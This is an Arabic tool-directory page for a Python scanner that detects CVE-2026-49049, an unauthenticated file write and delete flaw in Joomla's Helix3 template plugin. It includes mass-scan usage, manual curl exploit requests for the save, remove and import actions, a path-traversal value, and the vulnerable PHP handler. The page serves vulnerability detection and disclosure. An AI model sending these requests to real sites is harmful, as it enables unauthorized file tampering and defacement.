Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/shinthink/cve-2026-49049
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubshinthink/cve-2026-49049

CVE-2026-49049

ماسح ضوئي للثغرات الأمنية للقراءة فقط لـ CVE-2026-49049 — معالج AJAX غير مصادَق عليه لإضافة Helix3 في Joomla

عرض المستودع
4منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Python CVE CVSS License

CVE-2026-49049 — إضافة Helix3 لجوملا (JoomShaper)

معالج AJAX غير مصادَق — ماسح ثغرات للقراءة فقط


نظرة عامة

CVE-2026-49049 تؤثر على إطار قالب Helix3 لجوملا (الإصدارات 1.0 حتى 3.1.0). معالج onAjaxHelix3، الذي يمكن الوصول إليه عبر موزّع com_ajax الخاص بجوملا، لا يجري أي تحقق من المصادقة أو التفويض أو CSRF على العديد من الإجراءات التدميرية:

ملاحظة: تمت إضافة إجراء import في Helix3 v3.x. المواقع التي تعمل بإصدار v2.x تتأثر فقط بإجراءي save وremove.

تم اكتشاف الثغرة بواسطة Phil Taylor (mySites.guru) ونُشرت في 29 يونيو 2026.

الإصدارات المتأثرة

إصدار Helix3save/removeimport
1.0 – 2.xعرضة للخطرغير موجود
3.0 – 3.1.0عرضة للخطرعرضة للخطر
3.1.1+مصحّحمصحّح

التثبيت

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt

الاستخدام

root@kitploit:~
# Single target
python cve_2026_49049.py -t 192.168.1.100

# Mass scan
python cve_2026_49049.py -f targets.txt -o results.txt

# With JSON report + verbose
python cve_2026_49049.py -f targets.txt --json report.json -v

الوسائط

root@kitploit:~
  -t, --target     Single target (domain or IP)
  -f, --file       File with targets, one per line
  -o, --output     Real-time text output (default: cve-2026-49049_scan.txt)
  --json           Structured JSON report (default: cve-2026-49049_report.json)
  --threads        Concurrent workers (default: 15)
  --timeout        HTTP timeout in seconds (default: 15)
  -v, --verbose    Show probe details

إثبات المفهوم

الاكتشاف والتحقق

يقوم الماسح بفحص للقراءة فقط — يكتب ملف JSON غير ضار إلى مجلد تخطيطات Helix3 عبر نقطة نهاية save غير المصادَق عليها، ويتحقق من كتابته، ثم يحذفه فورًا عبر نقطة نهاية remove. لا تُترك أي تغييرات دائمة على الهدف.

root@kitploit:~
$ python cve_2026_49049.py -t 192.168.1.100 -v
root@kitploit:~
    CVE-2026-49049 — Helix3 (JoomShaper)
    Joomla Unauthenticated AJAX Handler Scanner

    [*] save   — accessible (probe: 3a9719da)
    [*] remove — accessible (probe cleaned)

  Host      : 192.168.1.100
  Status    : vulnerable
  Helix3    : 2.5.6
  Vulnerable: YES
  save      : YES
  remove    : YES
  import    : NO
  Time      : 2.0s

إعادة الإنتاج اليدوي

يقوم الماسح باختبار نقاط النهاية هذه بدقة. للتحقق اليدوي:

الخطوة 1 — تأكيد تثبيت Helix3

root@kitploit:~
curl -sk 'https://target.com/templates/shaper_helix3/templateDetails.xml'
# Look for <version>X.X.X</version>

الخطوة 2 — اختبار إجراء save (كتابة ملف غير مصادَق عليها)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'

الخطوة 3 — اختبار إجراء remove (حذف ملف غير مصادَق عليه)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=remove&data[layoutName]=_test_probe.json'

الخطوة 4 — اختبار إجراء import (v3.x فقط، غير متاح في v2.x)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=import&data[template_id]=1&data[settings]={}'

# Note: import was added in Helix3 v3.x.
# Sites running v2.x will return an empty response for this action.

آلية الثغرة

في إصدارات Helix3 قبل 3.1.1، يعالج plugins/ajax/helix3/helix3.php الطلبات عبر onAjaxHelix3() بدون أي حمايات:

root@kitploit:~
public function onAjaxHelix3()
{
    $input = Factory::getApplication()->input;
    $data  = $input->post->get('data', [], 'array');
    $action = $data['action'];
    $layoutName = $data['layoutName'];

    // No auth check. No CSRF token. No path validation.
    $filepath = $layoutPath . $layoutName;   // path traversal possible

    switch ($action) {
        case 'remove':
            unlink($filepath);               // arbitrary file delete
            break;
        case 'save':
            fwrite(fopen($filepath . '.json', 'wb'), $data['content']);  // write
            break;
    }
}

ما الذي يجعل هذه الثغرة خطيرة

  • Save + اجتياز المسار — layoutName=../../../somewhere/evil يكتب ملفات خارج دليل التخطيط المقصود
  • Remove بدون قيود على الامتداد — على عكس save (الذي يضيف .json)، يمكن لـ remove استهداف أي نوع ملفات
  • Import (v3.x) يستبدل معلمات قاعدة البيانات — يتم عرض custom_js بدون تهريب (unescaped) في مخرجات القالب، مما يتيح حقن سكربت في كل صفحة. هذا هو المتجه المستخدم في هجمات التشويه الواقعية.

إخلاء المسؤولية

لأغراض التعليم والاختبار المصرح به فقط.

هذا البرنامج مخصص لمحترفي الأمن الذين يجرون اختبارات اختراق مصرحًا بها، والمؤسسات التي تدقق بنيتها التحتية الخاصة، والباحثين الذين يدرسون استغلال الثغرات.

الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وقد ينتهك:

  • الولايات المتحدة: قانون الاحتيال وإساءة استخدام الحاسوب (18 U.S.C. 1030)
  • إندونيسيا: UU ITE Pasal 30 & 46
  • الاتحاد الأوروبي: التوجيه 2013/40/EU
  • المملكة المتحدة: قانون إساءة استخدام الحاسوب لعام 1990

لا يتحمل المؤلفون أي مسؤولية عن إساءة الاستخدام. باستخدامك لهذا البرنامج، فإنك تتحمل المسؤولية الكاملة عن أفعالك.


المراجع

الموردالرابط

هذا المشروع غير تابع لـ JoomShaper أو Joomla أو Open Source Matters, Inc.

تنزيل الأداة
الإجراءالتأثيرمتاح في
saveكتابة ملفات JSON يتحكم فيها المهاجم مع اجتياز المسار (path traversal)جميع الإصدارات
removeحذف ملفات عشوائية — بدون أي قيود على الامتداد أو المسارجميع الإصدارات
importاستبدال معلمات القالب المخزنة في قاعدة البياناتv3.x فقط
الاستشارة الأصلية (mySites.guru)الإصلاح الأمني Helix3 3.1.1
إدخال NVDCVE-2026-49049
OpenCVECVE-2026-49049
JoomShaper GitHubمستودع Helix3